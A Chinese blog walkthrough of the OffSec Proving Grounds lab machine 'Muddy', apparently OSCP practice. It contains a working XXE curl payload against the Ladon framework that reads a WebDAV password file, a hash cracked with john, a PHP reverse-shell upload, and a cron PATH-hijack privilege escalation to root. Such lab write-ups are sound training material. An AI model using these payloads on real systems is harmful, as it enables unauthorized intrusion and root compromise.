OSCP - Proving Grounds - Muddy

柴郡猫^O^

于 2024-10-10 17:53:01 发布

阅读量138

点赞数 5

分类专栏： OSCP 文章标签：网络安全安全性测试

本文链接：https://blog.csdn.net/N61320/article/details/142730746

版权

OSCP 专栏收录该内容

9 篇文章 0 订阅

订阅专栏

主要知识点

CVE-2019-1010268漏洞利用
apache配置文件路径
Linux 系统path 路径覆盖，Linux会优先从靠前的路径寻找可执行文件，借此覆盖相应命令达到提权目的

具体步骤

执行nmap扫描，发现很多端口都开了，不过有用的就是8888

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 20:15 EDT
Warning: 192.168.189.161 giving up on port because retransmission cap hit (10).
Nmap scan report for muddy.ugc (192.168.189.161)
Host is up (0.11s latency).
Not shown: 65503 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
25/tcp    open     smtp          Exim smtpd 4.92
| smtp-commands: muddy Hello muddy.ugc [192.168.45.157], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open     http          Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Muddy | Found some mud? Call us! &#8211; A muddy WordPress!
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
8888/tcp  open     http          WSGIServer 0.1 (Python 2.7.16)
|_http-title: Ladon Service Catalog

对80端口执行dirsearch,发现安装了一个webdav

# Dirsearch started Sun Oct  6 06:59:19 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u 192.168.116.161 -w /usr/share/wordlists/dirb/big.txt

301   323B   http://192.168.116.161/javascript    -> REDIRECTS TO: http://192.168.116.161/javascript/
403   280B   http://192.168.116.161/server-status
401   462B   http://192.168.116.161/webdav
301   321B   http://192.168.116.161/wp-admin    -> REDIRECTS TO: http://192.168.116.161/wp-admin/
301   323B   http://192.168.116.161/wp-content    -> REDIRECTS TO: http://192.168.116.161/wp-content/
301   324B   http://192.168.116.161/wp-includes    -> REDIRECTS TO: http://192.168.116.161/wp-includes/

访问8888端口发现enable了 Ladon framework搜索一下得到Ladon Framework for Python 0.9.40 - XML External Entity Expansion - XML webapps Exploit

其本质是本地文件包含，经过调查 apache的配置文件地址在 /etc/apache2/sites-available/000-default.config,发现webdav的密码位置

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf

        <Directory "/var/www/html/webdav">
          AuthType Basic
          AuthName "Restricted Content"
          AuthUserFile /var/www/html/webdav/passwd.dav
          DAV On
          Require valid-user
        </Directory>

</VirtualHost>

按照poc利用postman调用，得到webdav的password

curl --location '192.168.116.161:8888/muddy/soap11' \
--header 'Content-Type: text/xml; charset=utf-8' \
--header 'SOAPAction: http://192.168.116.161:8888/muddy/soap11/checkout' \
--data '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <checkout>
            <uid>&passwd;</uid>
        </checkout>
    </soap:Body>
</soap:Envelope>
'

Response

<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <ns:checkoutResponse>
            <result>Serial number: administrant:$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0</result>
        </ns:checkoutResponse>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

本地使用john来爆破密码

C:\home\kali\Documents\OFFSEC\WarmUp\Muddy> john webdav_passwd --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sleepless        (?)     
1g 0:00:00:00 DONE (2024-10-06 06:48) 1.818g/s 127418p/s 127418c/s 127418C/s softball30..ramarama
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

在Firefox上激活webdav扩展，可以直接上传文件，这里我们更改/usr/share/webshells/php/php-reverse-shell.php 并上传，在本地启动nc -nlvp 1234后访问http://192.168.116.161/webdav/php-reverse-shell.php后得到reverse shell

上传linpeas.sh并运行，发现有一个netstat的cron job，并且我们对于/dev/shm路径有写权限

SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    netstat -tlpn > /root/status && service apache2 status >> /root/status && service mysql status >> /root/status

bash-5.0# ls -la /dev | grep shm
ls -la /dev | grep shm
drwxrwxrwt  2 root root          60 Oct  6 07:24 shm

由于linux寻找命令是从path从左往右找，如果找到了就会调用，我们可以尝试修改netstat命令，得到root权限

www-data@muddy:/home/ian$ cd /dev/shm
cd /dev/shm
www-data@muddy:/dev/shm$ echo "chmod +s /bin/bash" >netstat
echo "chmod +s /bin/bash" >netstat
www-data@muddy:/dev/shm$ ls -l
ls -l
total 4
-rw-rw-rw- 1 www-data www-data 19 Oct  6 07:24 netstat
www-data@muddy:/dev/shm$ chmod +x netstat
chmod +x netstat
www-data@muddy:/dev/shm$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
www-data@muddy:/dev/shm$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
3c798fbaf8139af5c19c1d314fa139c8